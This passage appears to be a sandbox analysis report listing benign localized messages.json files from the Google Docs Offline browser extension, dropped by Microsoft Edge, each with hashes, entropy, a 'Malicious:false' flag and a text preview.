                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                                          MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                                          SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                                          SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                                          SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\cy\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):806
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                                          MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                                          SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                                          SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                                          SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\da\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):883
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                                          MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                                          SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                                          SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                                          SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\de\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1031
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                          MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                          SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                          SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                          SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\el\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1613
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                          MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                          SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                          SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                          SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\en\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):851
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                          MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                          SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                          SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                          SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\en_CA\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):851
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                          MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                          SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                          SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                          SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\en_GB\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):848
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                          MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                          SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                          SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                          SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\en_US\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1425
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                          MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                          SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                          SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                          SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\es\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):961
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                          MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                          SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                          SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                          SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\es_419\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):959
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                          MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                          SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                          SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                          SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\et\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):968
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                                          MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                                          SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                                          SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                                          SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\eu\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):838
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                                          MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                                          SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                                          SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                                          SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\fa\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1305
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                          MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                                          SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                          SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                          SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\fi\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):911
